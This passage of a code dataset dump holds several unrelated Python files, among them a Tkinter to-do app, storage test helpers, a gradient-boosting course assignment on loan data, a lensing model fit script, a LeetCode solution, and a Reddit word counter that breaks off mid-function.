пунктов перед сохранением\r\n count = 0\r\n while count < my_list.size():\r\n if my_list.itemcget(count, \"fg\") == \"#dedede\":\r\n my_list.delete(my_list.index(count))\r\n else:\r\n count += 1\r\n\r\n # выбор всех пунктов из списка\r\n stuff = my_list.get(0, END)\r\n\r\n # Открыть файл\r\n output_file = open(file_name, 'wb')\r\n\r\n pickle.dump(stuff, output_file)\r\n\r\ndef open_list():\r\n file_name = filedialog.askopenfilename(\r\n initialdir=\"F:/Python/To_Do/data\",\r\n title=\"Save File\",\r\n filetypes=(\r\n (\"Dat Files\", \"*.dat\"),\r\n (\"All Files\", \"*.*\"))\r\n )\r\n if file_name:\r\n my_list.delete(0, END)\r\n\r\n input_file = open(file_name, 'rb')\r\n\r\n stuff = pickle.load(input_file)\r\n\r\n for item in stuff:\r\n my_list.insert(END, item)\r\n\r\ndef delete_list():\r\n my_list.delete(0 ,END)\r\n\r\n# Создаем 
меню\r\nmy_menu = Menu(root)\r\nroot.config(menu=my_menu)\r\n\r\n# Добавляем элементы в меню\r\nfile_menu = Menu(my_menu, tearoff=False)\r\nmy_menu.add_cascade(label=\"Файл\", menu=file_menu)\r\n\r\nfile_menu.add_command(label=\"Сохранить список\", command=save_list)\r\nfile_menu.add_command(label=\"Открыть список\", command=open_list)\r\nfile_menu.add_separator()\r\nfile_menu.add_command(label=\"Очистить список\", command=delete_list)\r\n\r\nadd_button = Button(button_frame, text=\"Добавить\", command=add_item)\r\ndelete_button = Button(button_frame, text=\"Удалить\", command=delete_item)\r\ncross_off_button = Button(button_frame, text=\"Вычеркнуть\", command=cross_off_item)\r\nuncross_button = Button(button_frame, text=\"Отменить\", command=uncross_item)\r\ndelete_crossed_button = Button(button_frame, text=\"Удалить вычеркнутые\", command=delete_crossed)\r\n\r\nadd_button.grid(row=0, column=0)\r\ndelete_button.grid(row=0, column=1, padx=20)\r\ncross_off_button.grid(row=0, column=2)\r\nuncross_button.grid(row=0, column=3, padx=20)\r\ndelete_crossed_button.grid(row=0, column=4)\r\n\r\nroot.mainloop()\r\n","sub_path":"List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"508532088","text":"\"\"\"\nLive Storage Migration test helpers functions\n\"\"\"\nimport config\nfrom art.rhevm_api.tests_lib.low_level import (\n disks as ll_disks,\n)\nfrom rhevmtests.storage.helpers import prepare_disks_for_vm\n\n\ndef add_new_disk_for_test(\n vm_name, alias, provisioned_size=(1 * config.GB), sparse=False,\n disk_format=config.RAW_DISK, wipe_after_delete=False, attach=False,\n sd_name=None\n):\n \"\"\"\n Prepares disk for given vm\n \"\"\"\n disk_params = config.disk_args.copy()\n disk_params['alias'] = alias\n disk_params['active'] = False\n disk_params['provisioned_size'] = provisioned_size\n disk_params['format'] = disk_format\n disk_params['sparse'] = sparse\n disk_params['wipe_after_delete'] = wipe_after_delete\n disk_params['storagedomain'] = sd_name\n\n assert ll_disks.addDisk(True, **disk_params), (\n \"Failed to add disk %s\" % alias\n )\n ll_disks.wait_for_disks_status([alias])\n if attach:\n prepare_disks_for_vm(vm_name, [alias])\n","sub_path":"art/tests/rhevmtests/storage/storage_migration/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"332029452","text":"# coding:utf-8\nimport sys\nimport os\n# https://pythonhosted.org/PyInstaller/runtime-information.html\n\nfrozen = 'not'\nif getattr(sys, 'frozen', False): # we are running in a bundle\n frozen = 'ever so'\n bundle_dir = os.path.dirname(sys.executable)\nelse: # we are running in a normal Python environment\n bundle_dir = os.path.dirname(os.path.abspath(__file__))\nprint('we are', frozen, 'frozen')\nprint('bundle dir is', bundle_dir)\nprint('sys.argv[0] is', sys.argv[0])\nprint('sys.executable is', sys.executable)\nprint('os.getcwd is', os.getcwd())\n","sub_path":"pyToExe/pyinstaller/pyinstaller_test.py","file_name":"pyinstaller_test.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"435097387","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 27 19:26:42 2016\n\n@author: Tzyy Shyang\n\"\"\"\n\nimport pprint as pp\n\nimport pandas as pd\nimport numpy as np\n\nimport sklearn as 
sk\nimport sklearn.ensemble as sken\n\nimport coursera.ml_common.commonlib as cmn\n\n\"\"\"\nExploring Ensemble Methods\n==========================\n\nIn this homework we will explore the use of boosting. For this assignment, we will use the pre-implemented gradient boosted trees. You will:\n\n- Train a boosted ensemble of decision-trees (gradient boosted trees) on the lending club dataset.\n- Predict whether a loan will default along with prediction probabilities (on a validation set).\n- Evaluate the trained model and compare it with a baseline.\n- Find the most positive and negative loans using the learned model.\n- Explore how the number of trees influences classification performance.\n\n\"\"\"\n\n# Load the Lending Club dataset\n# =============================\n\n# We will be using a dataset from the LendingClub.\n\n# 1. Load the dataset into a data frame named loans.\nloans = pd.read_csv('../../data/lending-club-data.csv', index_col='id', dtype={'desc': object}, parse_dates=[47])\n\n# Exploring some features\n\n# 2. Let's quickly explore what the dataset looks like. First, print out the column names to see what features we have in this dataset. \n# Here, we should see that we have some feature columns that have to do with grade of the loan, annual income, home ownership status, etc.\nloans.columns.values\n\n# Modifying the target column\n# ===========================\n\n# The target column (label column) of the dataset that we are interested in is called bad_loans. In this column 1 means a risky (bad) loan 0 means a safe loan.\n\n# In order to make this more intuitive and consistent with the lectures, we reassign the target to be:\n\n# +1 as a safe loan\n# -1 as a risky (bad) loan\n\n# 3. We put this in a new column called safe_loans.\n# safe_loans = 1 => safe\n# safe_loans = -1 => risky\nloans['safe_loans'] = loans['bad_loans'].apply(lambda x: +1 if x==0 else -1)\nloans = loans.drop('bad_loans', 1)\n\n# Selecting features\n# ==================\n\n# In this assignment, we will be using a subset of features (categorical and numeric). The features we will be using are described in the code comments below. \n# If you are a finance geek, the LendingClub website (https://www.lendingclub.com/) has a lot more details about these features.\n\n# 4. The features we will be using are described in the code comments below. Extract these feature columns and target column from the dataset. 
\n# We will only use these features.\ntarget = 'safe_loans'\nfeatures = ['grade', # grade of the loan (categorical)\n 'sub_grade_num', # sub-grade of the loan as a number from 0 to 1\n 'short_emp', # one year or less of employment\n 'emp_length_num', # number of years of employment\n 'home_ownership', # home_ownership status: own, mortgage or rent\n 'dti', # debt to income ratio\n 'purpose', # the purpose of the loan\n 'payment_inc_ratio', # ratio of the monthly payment to income\n 'delinq_2yrs', # number of delinquincies\n 'delinq_2yrs_zero', # no delinquincies in last 2 years\n 'inq_last_6mths', # number of creditor inquiries in last 6 months\n 'last_delinq_none', # has borrower had a delinquincy\n 'last_major_derog_none', # has borrower had 90 day or worse rating\n 'open_acc', # number of open credit accounts\n 'pub_rec', # number of derogatory public records\n 'pub_rec_zero', # no derogatory public records\n 'revol_util', # percent of available credit being used\n 'total_rec_late_fee', # total late fees received to day\n 'int_rate', # interest rate of the loan\n 'total_rec_int', # interest received to date\n 'annual_inc', # annual income of borrower\n 'funded_amnt', # amount committed to the loan\n 'funded_amnt_inv', # amount committed by investors for the loan\n 'installment', # monthly payment owed by the borrower\n ]\n\n# Skipping observations with missing values\n# =========================================\n\n# Recall from the lectures that one common approach to coping with missing values is to skip observations that contain missing values.\n# In Pandas, we'd run\nloans = loans[[target] + features].dropna()\n\n# Your tool may provide a function to skip observations with missing values. Consult appropriate manuals.\n\n# Fortunately, as you should find, there are not too many missing values. We are retaining most of the data.\n\n# Then follow the following steps:\n\n# - Apply one-hot encoding to loans. Your tool may have a function for one-hot encoding. Alternatively, see #7 for implementation hints.\n# - Load the JSON files into the lists train_idx and validation_idx.\n# - Perform train/validation split using train_idx and validation_idx. In Pandas, for instance:\n\ncommonlib = cmn.MachineLearningCommonLib()\nencoded_loans = commonlib.one_hot_encoding(loans)\n\ntrain_idx = pd.read_json('../../data/ml-classification-module-8-assignment-1-train-idx.json')[0].values.tolist()\nvalidation_idx = pd.read_json('../../data/ml-classification-module-8-assignment-1-validation-idx.json')[0].values.tolist()\n\ntrain_data = encoded_loans.iloc[train_idx]\ntrain_target = train_data[target]\ntrain_data = train_data.drop(target, 1)\n\nvalidation_data = encoded_loans.iloc[validation_idx]\n\n# Gradient boosted tree classifier\n# ================================\n\n# Gradient boosted trees are a powerful variant of boosting methods; they have been used to win many Kaggle competitions, and have been widely used in industry. \n# We will explore the predictive power of multiple decision trees as opposed to a single decision tree.\n\n# Additional reading: If you are interested in gradient boosted trees, here is some additional reading material:\n\n# - GraphLab Create user guide (https://turi.com/learn/userguide/supervised-learning/boosted_trees_classifier.html)\n# - Advanced material on boosted trees (http://homes.cs.washington.edu/~tqchen/pdf/BoostedTree.pdf)\n\n# We will now train models to predict safe_loans using the features above. 
In this section, we will experiment with training an ensemble of 5 trees.\n\n# 9. Now, let's use the built-in scikit learn gradient boosting classifier (sklearn.ensemble.GradientBoostingClassifier) to create a gradient boosted \n# classifier on the training data. You will need to import sklearn, sklearn.ensemble, and numpy.\n\n# You will have to first convert the SFrame into a numpy data matrix. See the API for more information. You will also have to extract the label column. \n# Make sure to set max_depth=6 and n_estimators=5.\ngradient_boosting_classifier = sken.GradientBoostingClassifier(max_depth=6, n_estimators=5) \ngradient_boosting_classifier.fit(train_data, train_target)\n\n# Making predictions\n# ==================\n\n# Just like we did in previous sections, let us consider a few positive and negative examples from the validation set. We will do the following:\n\n# - Predict whether or not a loan is likely to default.\n# - Predict the probability with which the loan is likely to default.\n\n# 10. First, let's grab 2 positive examples and 2 negative examples. \n\nvalidation_safe_loans = validation_data[validation_data[target] == 1]\nvalidation_risky_loans = validation_data[validation_data[target] == -1]\n\nsample_validation_data_risky = validation_risky_loans[0:2]\nsample_validation_data_safe = validation_safe_loans[0:2]\n\nsample_validation_data = sample_validation_data_safe.append(sample_validation_data_risky)\nsample_validation_data = sample_validation_data.drop(target,1)\n\n# 11. For each row in the sample_validation_data, write code to make model_5 predict whether or not the loan is classified as a safe loan. \n# (Hint: if you are using scikit-learn, you can use the .predict() method)\n\nmodel_5 = gradient_boosting_classifier.predict(sample_validation_data)\n\n# Quiz question: What percentage of the predictions on sample_validation_data did model_5 get correct?\n# ans = 75%\n\n# Prediction Probabilities\n# ========================\n\n# 12. For each row in the sample_validation_data, what is the probability (according model_5) of a loan being classified as safe? \n# (Hint: if you are using scikit-learn, you can use the .predict_proba() method)\nmodel_5_prob = gradient_boosting_classifier.predict_proba(sample_validation_data)[:,1]\n\n# Quiz Question: Which loan has the highest probability of being classified as a safe loan?\n# ans = loan 4\n\n# Checkpoint: Can you verify that for all the predictions with probability >= 0.5, the model predicted the label +1?\n\n# Evaluating the model on the validation data\n# ===========================================\n\n# Recall that the accuracy is defined as follows:\n\n# 13. Evaluate the accuracy of the model_5 on the validation_data. (Hint: if you are using scikit-learn, you can use the .score() method)\nvalidation_data_without_target = validation_data.drop(target,1)\nmodel_5_accuracy = gradient_boosting_classifier.score(validation_data_without_target, validation_data[target])\n\n# 14. Calculate the number of false positives made by the model on the validation_data.\nmodel_5_predicted_valid_data = gradient_boosting_classifier.predict(validation_data_without_target)\nfalse_positive_count = 0\nfalse_negative_count = 0\nfor predict, valid in zip(model_5_predicted_valid_data, validation_data[target]):\n if valid == -1 and predict == +1:\n false_positive_count += 1\n if valid == +1 and predict == -1:\n false_negative_count += 1\n\n# Quiz question: What is the number of false positives on the validation_data?\n# ans = 1653\n\n# 15. 
Calculate the number of false negatives made by the model on the validation_data.\n# ans = 1491\n\n# Comparison with decision trees\n# ==============================\n\n# In the earlier assignment, we saw that the prediction accuracy of the decision trees was around 0.64. In this assignment, \n# we saw that model_5 has an accuracy of approximately 0.67.\n\n# Here, we quantify the benefit of the extra 3% increase in accuracy of model_5 in comparison with a single decision tree from the original \n# decision tree assignment.\n\n# As we explored in the earlier assignment, we calculated the cost of the mistakes made by the model. We again consider the same costs as follows:\n\n# - False negatives: Assume a cost of $10,000 per false negative.\n# - False positives: Assume a cost of $20,000 per false positive.\n\n# Assume that the number of false positives and false negatives for the learned decision tree was\n\n# - False negatives: 1936\n# - False positives: 1503\n\n# Using the costs defined above and the number of false positives and false negatives for the decision tree, we can calculate the total cost of the mistakes made by the \n# decision tree model as follows:\n# cost = $10,000 * 1936 + $20,000 * 1503 = $49,420,000\n\n# The total cost of the mistakes of the model is $49.42M. That is a lot of money!.\n\n# 16. Calculate the cost of mistakes made by model_5 on the validation_data.\ncost = 10000*1491 + 20000*1653\n\n# Quiz Question: Using the same costs of the false positives and false negatives, what is the cost of the mistakes made by the boosted tree model \n# (model_5) as evaluated on the validation_set?\n# ans = 47970000\n\n# Reminder: Compare the cost of the mistakes made by the boosted trees model with the decision tree model. The extra 3% improvement in prediction \n# accuracy can translate to several million dollars! And, it was so easy to get by simply boosting our decision trees.\n\n# Most positive & negative loans\n# ==============================\n\n# In this section, we will find the loans that are most likely to be predicted safe. We can do this in a few steps:\n\n# - Step 1: Use the model_5 (the model with 5 trees) and make probability predictions for all the loans in validation_data.\n# - Step 2: Similar to what we did in the very first assignment, add the probability predictions as a column called predictions into validation_data.\n# - Step 3: Sort the data (in descreasing order) by the probability predictions.\n\n# 17. Start here with Step 1 & Step 2. Make predictions using model_5 for all examples in the validation_data.\nmodel_5_validation_data_prob_prediction = gradient_boosting_classifier.predict_proba(validation_data_without_target)[:,1]\nvalidation_data['predictions'] = model_5_validation_data_prob_prediction\n# Checkpoint: For each row, the probabilities should be a number in the range [0, 1].\n\n# 18. Now, we are ready to go to Step 3. You can now use the prediction column to sort the loans in validation_data (in descending order) by prediction probability. Find the top 5 loans with the highest probability of being predicted as a safe loan.\nvalidation_data = validation_data.sort_values(['predictions'], ascending=[False])\n\n# Quiz question: What grades are the top 5 loans?\n# ans = grade A\n\n# 19. 
Repeat this exercise to find the 5 loans (in the validation_data) with the lowest probability of being predicted as a safe loan.\nvalidation_data_safe = validation_data[validation_data['predictions'] > 0.5].sort_values(['predictions'], ascending=[True])\n\n# Effects of adding more trees\n# ============================\n\n# In this assignment, we will train 5 different ensemble classifiers in the form of gradient boosted trees.\n\n# 20. Train models with 10, 50, 100, 200, and 500 trees. Use the n_estimators parameter to control the number of trees. Remember to keep max_depth = 6.\n# Call these models model_10, model_50, model_100, model_200, and model_500, respectively. This may take a few minutes to run.\n# Compare accuracy on entire validation set\ngradient_boosting_classifier_10 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=10) \ngradient_boosting_classifier_10.fit(train_data, train_target)\nmodel_10 = gradient_boosting_classifier_10.predict(validation_data_without_target)\n\ngradient_boosting_classifier_50 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=50) \ngradient_boosting_classifier_50.fit(train_data, train_target)\nmodel_50 = gradient_boosting_classifier_50.predict(validation_data_without_target)\n\ngradient_boosting_classifier_100 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=100) \ngradient_boosting_classifier_100.fit(train_data, train_target)\nmodel_100 = gradient_boosting_classifier_100.predict(validation_data_without_target)\n\ngradient_boosting_classifier_200 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=200) \ngradient_boosting_classifier_200.fit(train_data, train_target)\nmodel_200 = gradient_boosting_classifier_200.predict(validation_data_without_target)\n\ngradient_boosting_classifier_500 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=500) \ngradient_boosting_classifier_500.fit(train_data, train_target)\nmodel_500 = gradient_boosting_classifier_500.predict(validation_data_without_target)\n\n# Now we will compare the predicitve accuracy of our models on the validation set.\n\n# 21. Evaluate the accuracy of the 10, 50, 100, 200, and 500 tree models on the validation_data.\nmodel_10_accuracy = gradient_boosting_classifier_10.score(validation_data_without_target, validation_data[target])\nmodel_50_accuracy = gradient_boosting_classifier_50.score(validation_data_without_target, validation_data[target])\nmodel_100_accuracy = gradient_boosting_classifier_100.score(validation_data_without_target, validation_data[target])\nmodel_200_accuracy = gradient_boosting_classifier_200.score(validation_data_without_target, validation_data[target])\nmodel_500_accuracy = gradient_boosting_classifier_500.score(validation_data_without_target, validation_data[target])\n\n# Quiz Question: Which model has the best accuracy on the validation_data?\n# ans = model_5 or model_10\n\n# Quiz Question: Is it always true that the model with the most trees will perform best on test data?\n# ans = False\n\n# Plot the training and validation error vs. number of trees\n# ==========================================================\n\n# Recall from the lecture that the classification error is defined as\n# classification error = 1 - accuracy\n\n# In this section, we will plot the training and validation errors versus the number of trees to get a sense of how these models are performing. \n# We will compare the 10, 50, 100, 200, and 500 tree models. You will need matplotlib in order to visualize the plots.\n\n# 22. 
First, make sure this block of code runs on your computer.\nimport matplotlib.pyplot as plt\n# %matplotlib inline\ndef make_figure(dim, title, xlabel, ylabel, legend):\n plt.rcParams['figure.figsize'] = dim\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if legend is not None:\n plt.legend(loc=legend, prop={'size':15})\n plt.rcParams.update({'font.size': 16})\n plt.tight_layout()\n \n# In order to plot the classification errors (on the train_data and validation_data) versus the number of trees, we will need lists of all \n# the errors.\n\n# Steps to follow:\n\n# - Step 1: Calculate the classification error for each model on the training data (train_data).\n# - Step 2: Store the training errors into a list (called training_errors) that looks like this: [train_err_10, train_err_50, ..., train_err_500]\n# - Step 3: Calculate the classification error of each model on the validation data (validation_data).\n# - Step 4: Store the validation classification error into a list (called validation_errors) that looks like this:[validation_err_10, validation_err_50, ..., validation_err_500]\n\n# Once that has been completed, we will give code that should be able to evaluate correctly and generate the plot.\n# 23. Let us start with Step 1. Write code to compute the classification error on the train_data for models model_10, model_50, model_100, \n# model_200, and model_500.\nmodel_10_train_accuracy = gradient_boosting_classifier_10.score(train_data, train_target)\ntrain_err_10 = commonlib.calc_classification_error(model_10_train_accuracy)\n\nmodel_50_train_accuracy = gradient_boosting_classifier_50.score(train_data, train_target)\ntrain_err_50 = commonlib.calc_classification_error(model_50_train_accuracy)\n\nmodel_100_train_accuracy = gradient_boosting_classifier_100.score(train_data, train_target)\ntrain_err_100 = commonlib.calc_classification_error(model_100_train_accuracy)\n\nmodel_200_train_accuracy = gradient_boosting_classifier_200.score(train_data, train_target)\ntrain_err_200 = commonlib.calc_classification_error(model_200_train_accuracy)\n\nmodel_500_train_accuracy = gradient_boosting_classifier_500.score(train_data, train_target)\ntrain_err_500 = commonlib.calc_classification_error(model_500_train_accuracy)\n\n# 24. Now, let us run Step 2. Save the training errors into a list called training_errors.\ntraining_errors = [train_err_10, train_err_50, train_err_100, train_err_200, train_err_500]\n\n# 27. Now, we will plot the training_errors and validation_errors versus the number of trees. We will compare the 10, 50, 100, 200, \n# and 500 tree models. We provide some plotting code to visualize the plots within this notebook.\n\nvalid_err_10 = commonlib.calc_classification_error(model_10_accuracy)\nvalid_err_50 = commonlib.calc_classification_error(model_50_accuracy)\nvalid_err_100 = commonlib.calc_classification_error(model_100_accuracy)\nvalid_err_200 = commonlib.calc_classification_error(model_200_accuracy)\nvalid_err_500 = commonlib.calc_classification_error(model_500_accuracy)\n\nvalidation_errors = [valid_err_10, valid_err_50, valid_err_100, valid_err_200, valid_err_500]\n\n# 28. 
Run the following code to visualize the plots.\nplt.plot([10, 50, 100, 200, 500], training_errors, linewidth=4.0, label='Training error')\nplt.plot([10, 50, 100, 200, 500], validation_errors, linewidth=4.0, label='Validation error')\n\nmake_figure(dim=(10,5), \n title='Error vs number of trees',\n xlabel='Number of trees',\n ylabel='Classification error',\n legend='best')\n \n# Quiz question: Does the training error reduce as the number of trees increases?\n# ans = True\n\n# Quiz question: Is it always true that the validation error will reduce as the number of trees increases?\n# ans = False","sub_path":"python/coursera/ml_classification/week5/assignment1-exploring_ensemble_methods.py","file_name":"assignment1-exploring_ensemble_methods.py","file_ext":"py","file_size_in_byte":20476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"536336000","text":"#!/usr/bin/env python3\nimport os\nfrom setuptools import setup, find_packages\nfrom jsonrpc import version\n\n\ndef read(fname):\n try:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n except IOError:\n return \"\"\n\nsetup(\n name=\"json-rpc-3\",\n version=version,\n packages=find_packages(),\n test_suite=\"nose.collector\",\n tests_require=[\"nose\", \"mock\"],\n author='see AUTHORS',\n maintainer='Orhideous',\n maintainer_email='orhideous@gmail.com',\n url=\"https://github.com/Orhideous/json-rpc\",\n description=\"Pure Python 3 JSON-RPC 2.0 transport realisation\",\n long_description=read('README.rst'),\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.2\",\n \"Programming Language :: Python :: 3.3\",\n \"Programming Language :: Python :: 3.4\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords=[\"json\", \"rpc\", \"json-rpc\", \"transport\"],\n license=\"MIT\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"246203136","text":"from optparse import OptionParser\n\nimport numpy as np\nimport pandas as pd\n\nfrom ..util import file_handling as fh\n\ndef main():\n usage = \"%prog predictions_file.csv cfm_file.json output_filename.csv n_labels\"\n parser = OptionParser(usage=usage)\n #parser.add_option('--keyword', dest='key', default=None,\n # help='Keyword argument: default=%default')\n #parser.add_option('--boolarg', action=\"store_true\", dest=\"boolarg\", default=False,\n # help='Keyword argument: default=%default')\n\n (options, args) = parser.parse_args()\n\n predictions_file = args[0]\n cfm_file = args[1]\n output_filename = args[2]\n n_labels = int(args[3])\n\n predictions_df = pd.read_csv(predictions_file, header=0, index_col=0)\n cfm_json = fh.read_json(cfm_file)\n cfm = np.array(cfm_json['confusion_matrix'])\n\n predictions = list(predictions_df['prediction'].as_matrix().tolist())\n\n n_items = len(predictions)\n\n corrected = np.zeros([n_items, n_labels])\n\n for i, p in enumerate(predictions):\n corrected[i, :] = cfm[p, :]\n\n for n in range(n_labels):\n predictions_df[str(n)] = corrected[:, n]\n\n predictions_df.to_csv(output_filename)\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"core/postprocessing/apply_correction.py","file_name":"apply_correction.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129044313","text":"from typing import List\n\n\nclass Solution:\n def suggestedProducts(self, products: List[str], searchWord: str) -> List[List[str]]:\n \"\"\"\n Given an array of strings `products` and a string `searchWord`. We want to design a system that suggests at most three product names from `products` after each character of `searchWord` is typed. Suggested products should have common prefix with the searchWord. If there are more than three products with a common prefix return the three lexicographically minimums products.\n\n Return *list of lists* of the suggested `products` after each character of `searchWord` is typed.\n\n\n **Example 1:**\n\n ```\n Input: products = [\"mobile\",\"mouse\",\"moneypot\",\"monitor\",\"mousepad\"], searchWord = \"mouse\"\n Output: [\n [\"mobile\",\"moneypot\",\"monitor\"],\n [\"mobile\",\"moneypot\",\"monitor\"],\n [\"mouse\",\"mousepad\"],\n [\"mouse\",\"mousepad\"],\n [\"mouse\",\"mousepad\"]\n ]\n Explanation: products sorted lexicographically = [\"mobile\",\"moneypot\",\"monitor\",\"mouse\",\"mousepad\"]\n After typing m and mo all products match and we show user [\"mobile\",\"moneypot\",\"monitor\"]\n After typing mou, mous and mouse the system suggests [\"mouse\",\"mousepad\"]\n ```\n\n **Example 2:**\n\n ```\n Input: products = [\"havana\"], searchWord = \"havana\"\n Output: [[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"]]\n ```\n\n **Example 3:**\n\n ```\n Input: products = [\"bags\",\"baggage\",\"banner\",\"box\",\"cloths\"], searchWord = \"bags\"\n Output: [[\"baggage\",\"bags\",\"banner\"],[\"baggage\",\"bags\",\"banner\"],[\"baggage\",\"bags\"],[\"bags\"]]\n ```\n\n **Example 4:**\n\n ```\n Input: products = [\"havana\"], searchWord = \"tatiana\"\n Output: [[],[],[],[],[],[],[]]\n ```\n\n\n\n **Constraints:**\n\n - `1 <= products.length <= 1000`\n - There are no repeated elements in `products`.\n - `1 <= Σ products[i].length <= 2 * 10^4`\n - All characters of `products[i]` are lower-case English letters.\n - `1 <= searchWord.length <= 1000`\n - All characters of `searchWord` are lower-case English letters.\n\n\n Parameters\n ----------\n products: List[str]\n searchWord: str\n\n Returns\n -------\n int\n\n Examples\n --------\n\n Notes\n -----\n\n References\n ---------\n\n \"\"\"\n from bisect import bisect_left\n i, res, prefix = 0, [], ''\n products.sort()\n for ch in searchWord:\n prefix = prefix + ch\n i = bisect_left(products, prefix, i)\n res.append([w for w in products[i:i+3] if w.startswith(prefix)])\n return res\n\n def suggestedProducts01(self, products: List[str], searchWord: str) -> List[List[str]]:\n from collections import defaultdict\n\n class Trie:\n def __init__(self):\n self.sub = defaultdict(Trie)\n self.suggestions = []\n\n def add_suggestions(self, word):\n if len(self.suggestions) < 3:\n self.suggestions.append(word)\n\n products = sorted(products)\n root = Trie()\n for word in products:\n node = root\n for ch in word:\n node = node.sub[ch]\n node.add_suggestions(word)\n\n res, node = [], root\n for ch in searchWord:\n node = node.sub[ch]\n res.append(node.suggestions)\n\n return 
res\n\n\n\n","sub_path":"01268/search_suggestions_system.py","file_name":"search_suggestions_system.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"449882717","text":"#!/usr/bin/env python\n#######################\n# Run a ML pdz fit for an nfw model\n########################\n\nimport numpy as np\nimport sys, ldac, astropy, astropy.io.fits as pyfits, cPickle\nimport shearprofile as sp\nimport nfwmodel\n\n\n\n##########################\n\ninputCatFile = sys.argv[1]\ninputPDZ = sys.argv[2]\nshapedistro_module = sys.argv[3]\noutputFile = sys.argv[4]\n\n##########################\n\ninputcat = ldac.openObjectFile(inputCatFile)\n\nconcentration = inputcat.hdu.header['CONCEN']\nzcluster = inputcat.hdu.header['Z']\n\n\nD_lens = sp.angulardist(zcluster)\npixscale = 0.2\nminPix = 0.3 * 3600. * (180./np.pi) / ( pixscale * D_lens )\nmaxPix = 5. * 3600. * (180./np.pi) / ( pixscale * D_lens )\n\ngoodObjs = np.logical_and(np.logical_and(inputcat['r_pix'] > minPix, \n inputcat['r_pix'] < maxPix),\n np.logical_and(inputcat['z_b'] > 0,\n inputcat['z_b'] < 1.25))\n\n\nshapedistro = __import__(shapedistro_module)\n\nbin_selectors = [np.logical_and(goodObjs, selector) \\\n for selector in shapedistro.bin_selectors(inputcat)]\n\n\npdzfile = open(inputPDZ, 'rb')\npdzrange, pdz = cPickle.load(pdzfile)\npdzrange = pdzrange.astype(np.float64)\npdz = pdz.astype(np.float64)\n\n\nbetas = sp.beta_s(pdzrange, zcluster)\n\nrs = np.arange(0.01, 1.0, 0.0005)\n\nrs, scan = nfwmodel.scan_model(rs, \n [inputcat['r_mpc'][x].astype(np.float64) for x in bin_selectors],\n [inputcat['ghats'][x].astype(np.float64) for x in bin_selectors],\n betas,\n [pdz[x] for x in bin_selectors],\n concentration,\n zcluster,\n shapedistro.likelihood_func,\n shapedistro.samples)\n\n\n\n\ncols = [ pyfits.Column(name = 'Rs', format = 'E', array = rs),\n pyfits.Column(name = 'prob', format = 'E', array = scan)]\ncat = pyfits.BinTableHDU.from_columns(cols)\ncat.header['EXTNAME']= 'OBJECTS'\n\ncat.writeto(outputFile, overwrite=True)\n","sub_path":"nfwmodel_binned_batchrunner.py","file_name":"nfwmodel_binned_batchrunner.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"243504672","text":"#!/usr/bin/python3\n\"\"\"\nDefines recursive function to query the Reddit API,\nparse titles of all hot articles, and print sorted count\n\"\"\"\n\n\ndef count_words(subreddit, word_list, after=None, count={}):\n \"\"\"\n Queries the Reddit API, parses titles of all hot articles,\n and prints sorted count\n\n parameters:\n subreddit: subreddit to query for hot articles\n word_list: list of keywords to count\n after: indicates next starting point to get data after\n count: dictionary of current count of keyword\n \"\"\"\n import json\n import requests\n if after is None:\n sub_URL = 'https://www.reddit.com/r/{}/hot.json'.format(subreddit)\n else:\n sub_URL = 'https://www.reddit.com/r/{}/hot.json?after={}'.format(\n subreddit, after)\n subreddit_info = requests.get(sub_URL,\n headers={\"user-agent\": \"user\"},\n allow_redirects=False)\n for word in word_list:\n word = word.lower()\n if word not in count.keys():\n count[word] = 0\n try:\n data = subreddit_info.json().get(\"data\")\n except:\n return\n children = data.get(\"children\")\n for child in children:\n title = (child.get(\"data\").get(\"title\").lower())\n title = title.split(' ')\n for word in word_list:\n word 
